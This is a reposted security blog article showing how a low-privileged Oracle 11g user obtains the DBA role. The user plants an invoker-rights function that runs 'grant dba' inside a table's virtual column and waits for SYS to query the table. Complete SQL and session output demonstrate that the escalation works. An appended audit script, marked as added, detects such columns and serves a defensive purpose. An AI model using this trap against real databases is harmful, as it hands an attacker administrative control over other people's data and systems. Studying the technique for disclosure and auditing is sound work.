
Oracle 11g: Using Virtual Columns to Obtain DBA Privileges

2013-01-16 11:54


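Author: Birdarmy

First published on 微安全, the technical blog of the Sina Weibo security team. Please credit the source when reposting.

[Thanks to Birdarmy of Linux520 for contributing this article]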

Oracle 11g introduced a new feature, virtual columns.

The official documentation describes it as follows:

A virtual column is not stored on disk. Rather, the database derives the values in a virtual column on demand by computing a set of expressions or functions. Virtual columns can be used in queries, DML, and DDL statements.

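With a virtual column, the database evaluates the expression or function only when the column's data is needed and does not store the result on disk, much like a view.

Virtual column syntax: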

column_name [datatype] [GENERATED ALWAYS] AS (expression) [VIRTUAL]

For example:

SQL> create table test(a int,b int,c generated always as (a+b) virtual);

Table created.

SQL> insert into test (a ,b ) values (10,20);

1 row created.

SQL> select * from test;

         A          B          C
---------- ---------- ----------
        10         20         30

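Because a virtual column's expression can call a function, a user who also has the privilege to create functions can use the kind of granting function that is common in Oracle privilege escalation. With the granting function placed in a virtual column, the function fires when sys queries the table. Any other way of triggering it works too: as long as the function runs, the user is raised to DBA.

Example:

First we create a user, birdarmy, who can create tables and functions. To keep the test simple, I grant the connect and resource roles directly.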

SQL> create user birdarmy identified by 123456;

User created.

SQL> grant connect,resource to birdarmy;

Grant succeeded.

Log in as birdarmy and create the exploit function and table.

[oracle@ORA-TEST-03 ~]$ sqlplus birdarmy@gc12

SQL*Plus: Release 11.2.0.2.0 Production on Mon May 7 15:36:12 2012

Copyright (c) 1982, 2010, Oracle.  All rights reserved.

Enter password:

Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

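Create a granting function that runs grant dba to birdarmy to raise privileges. When sys, or another user with the ability to grant high privileges, calls this function, birdarmy is raised to DBA.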

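SQL> CREATE OR REPLACE FUNCTION GRANT_DBA_TO_USER (v IN INT)
  -- AUTHID CURRENT_USER: the body runs with the privileges of the invoking user.
  -- DETERMINISTIC: required for a function used in a virtual column expression.
  RETURN INT AUTHID CURRENT_USER DETERMINISTIC
AS
  -- An autonomous transaction lets the GRANT run from inside a query.
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'grant dba to birdarmy';
  RETURN 0;
END GRANT_DBA_TO_USER;
/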

Create a test table, exploit_virtual_columns, that uses the granting function in a virtual column.

SQL> create table exploit_virtual_columns(a int,b generated always AS (GRANT_DBA_TO_USER (a)) virtual);

Insert one row, so that the virtual column's function fires when a user queries exploit_virtual_columns.

SQL> insert  into exploit_virtual_columns (a) values (1);

Check the current user's privileges: only connect and resource.

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
BIRDARMY                       CONNECT                        NO  YES NO
BIRDARMY                       RESOURCE                       NO  YES NO

[oracle@ORA-TEST-03 ~]$ sqlplus / as sysdba

SQL*Plus: Release 11.2.0.2.0 Production on Mon May 7 15:42:43 2012

Copyright (c) 1982, 2010, Oracle.  All rights reserved.

Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

Query exploit_virtual_columns as sys, which triggers the GRANT_DBA_TO_USER function in the virtual column.

SQL> select * from birdarmy.exploit_virtual_columns;

         A          B
---------- ----------
         1          0

[oracle@ORA-TEST-03 ~]$ sqlplus birdarmy@gc12

SQL*Plus: Release 11.2.0.2.0 Production on Mon May 7 15:43:14 2012

Copyright (c) 1982, 2010, Oracle.  All rights reserved.

Enter password:

Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

Check the user's privileges: DBA has been obtained.

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
BIRDARMY                       CONNECT                        NO  YES NO
BIRDARMY                       DBA                            NO  YES NO
BIRDARMY                       RESOURCE                       NO  YES NO
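
An added audit example, not part of the original article: a check a DBA can run before querying tables in another schema. It lists each visible virtual column whose expression calls a standalone user-created function, with that function's AUTHID, using the DBA_TAB_COLS and DBA_PROCEDURES dictionary views. The excluded-schema list and the simple substring match are assumptions of this sketch.

```sql
-- Added audit example; run as a DBA in SQL*Plus.
SET SERVEROUTPUT ON
DECLARE
  v_expr VARCHAR2(32767);
BEGIN
  -- Visible virtual columns outside the Oracle-maintained schemas
  -- (the exclusion list is an assumption; extend it for your site).
  FOR c IN (SELECT owner, table_name, column_name, data_default
              FROM dba_tab_cols
             WHERE virtual_column = 'YES'
               AND hidden_column  = 'NO'
               AND owner NOT IN ('SYS', 'SYSTEM'))
  LOOP
    -- DATA_DEFAULT is a LONG and cannot be filtered in SQL, so fetch it
    -- into PL/SQL, then drop quotes and spaces and upper-case it.
    v_expr := c.data_default;
    v_expr := UPPER(REPLACE(REPLACE(v_expr, '"'), ' '));

    -- Standalone functions created by ordinary users.
    FOR f IN (SELECT owner, object_name, authid
                FROM dba_procedures
               WHERE object_type = 'FUNCTION'
                 AND owner NOT IN ('SYS', 'SYSTEM'))
    LOOP
      -- Substring match on NAME( ; it can over-report, so treat each
      -- hit as a candidate for manual review.
      IF INSTR(v_expr, UPPER(f.object_name) || '(') > 0 THEN
        DBMS_OUTPUT.PUT_LINE(
          c.owner || '.' || c.table_name || '.' || c.column_name ||
          ' calls ' || f.owner || '.' || f.object_name ||
          ' (AUTHID ' || f.authid || ')');
      END IF;
    END LOOP;
  END LOOP;
END;
/
```

A hit with AUTHID CURRENT_USER in a schema owned by a low-privileged account matches the pattern shown in this article; review the function body before any privileged account selects from that table.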

 

 

Source: minisafe.sinaapp.com/69.html
